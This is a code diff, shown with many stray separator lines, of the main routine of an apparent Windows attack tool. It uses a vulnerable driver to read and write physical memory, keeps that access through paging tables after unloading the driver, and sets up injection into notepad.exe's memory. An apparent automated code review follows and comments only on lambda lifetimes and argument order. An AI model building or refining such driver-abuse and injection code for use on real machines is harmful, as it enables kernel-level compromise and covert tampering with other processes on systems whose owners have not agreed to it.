|
|
@ -11,18 +11,47 @@ int __cdecl main(int argc, char** argv)
|
|
|
|
return -1;
|
|
|
|
return -1;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
vdm::vdm_ctx vdm;
|
|
|
|
// read physical memory using the driver...
|
|
|
|
|
|
|
|
vdm::read_phys_t _read_phys =
|
|
|
|
|
|
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return vdm::read_phys(addr, buffer, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// write physical memory using the driver...
|
|
|
|
|
|
|
|
vdm::write_phys_t _write_phys =
|
|
|
|
|
|
|
|
[&](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return vdm::write_phys(addr, buffer, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
vdm::vdm_ctx vdm(_read_phys, _write_phys);
|
|
|
|
nasa::mem_ctx my_proc(vdm);
|
|
|
|
nasa::mem_ctx my_proc(vdm);
|
|
|
|
nasa::mem_ctx notepad_proc(vdm, util::get_pid("notepad.exe"));
|
|
|
|
|
|
|
|
nasa::injector_ctx injector(&my_proc, ¬epad_proc);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// driver no longer needs to be loaded since paging tables are all setup :^)
|
|
|
|
// read physical memory via paging tables and not with the driver...
|
|
|
|
|
|
|
|
_read_phys = [&my_proc](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return my_proc.read_phys(buffer, addr, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// write physical memory via paging tables and not with the driver...
|
|
|
|
|
|
|
|
_write_phys = [&my_proc](void* addr, void* buffer, std::size_t size) -> bool
|
|
|
|
|
|
|
|
{
|
|
|
|
|
|
|
|
return my_proc.write_phys(buffer, addr, size);
|
|
|
|
|
|
|
|
};
|
|
|
|
|
|
|
|
|
|
|
|
if (!vdm::unload_drv(drv_handle, drv_key))
|
|
|
|
if (!vdm::unload_drv(drv_handle, drv_key))
|
|
|
|
{
|
|
|
|
{
|
|
|
|
std::printf("[!] unable to unload vulnerable driver...\n");
|
|
|
|
std::printf("[!] unable to unload vulnerable driver...\n");
|
|
|
|
return -1;
|
|
|
|
return -1;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
vdm.set_read(_read_phys);
|
|
|
|
|
|
|
|
vdm.set_write(_write_phys);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
nasa::mem_ctx notepad_proc(vdm, util::get_pid("notepad.exe"));
|
|
|
|
|
|
|
|
nasa::injector_ctx injector(&my_proc, ¬epad_proc);
|
|
|
|
|
|
|
|
|
|
|
|
if (!injector.init())
|
|
|
|
if (!injector.init())
|
|
|
|
{
|
|
|
|
{
|
|
|
|
std::printf("[!] failed to init injector_ctx...\n");
|
|
|
|
std::printf("[!] failed to init injector_ctx...\n");
|
|
|
@ -33,11 +62,8 @@ int __cdecl main(int argc, char** argv)
|
|
|
|
reinterpret_cast<std::uintptr_t>(
|
|
|
|
reinterpret_cast<std::uintptr_t>(
|
|
|
|
GetModuleHandleA("ntdll.dll"));
|
|
|
|
GetModuleHandleA("ntdll.dll"));
|
|
|
|
|
|
|
|
|
|
|
|
const auto ntdll_inject_addr = injector.translate(ntdll_base);
|
|
|
|
const auto ntdll_base_injected = injector.translate(ntdll_base);
|
|
|
|
std::printf("[+] ntdll base address -> 0x%p\n", ntdll_base);
|
|
|
|
std::printf("[+] ntdll base -> 0x%p\n", ntdll_base_injected);
|
|
|
|
std::printf("[+] ntdll reverse inject address -> 0x%p\n", ntdll_inject_addr);
|
|
|
|
|
|
|
|
std::printf("[+] ntdll MZ -> 0x%x\n", *(short*)ntdll_inject_addr);
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
std::printf("[+] press any key to close...\n");
|
|
|
|
std::printf("[+] press any key to close...\n");
|
|
|
|
std::getchar();
|
|
|
|
std::getchar();
|
|
|
|
}
|
|
|
|
}
|
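Review bot: The two replacement lambdas in the first hunk capture `my_proc` by reference and are then handed to `vdm` through `set_read`/`set_write`, yet `vdm` is declared before `my_proc`, so at scope exit `my_proc` is destroyed while `vdm` still holds callbacks that refer to it. If `vdm_ctx` invokes either callback during teardown, that is a dangling reference; the class is not visible on this page, so this needs confirming against its destructor. The argument order also flips between the two pairs, `vdm::read_phys(addr, buffer, size)` versus `my_proc.read_phys(buffer, addr, size)`, and because both pointers are `void*` the compiler cannot catch a swap; a comment above the reassignment such as `// mem_ctx::read_phys/write_phys take (buffer, addr, size); vdm::read_phys/write_phys take (addr, buffer, size)` would make that explicit. The first pair of lambdas uses nothing from the enclosing scope and can be written with `[]` instead of `[&]`. The body of `main` begins before the first hunk, so declarations such as `drv_handle` and `drv_key` are not visible here.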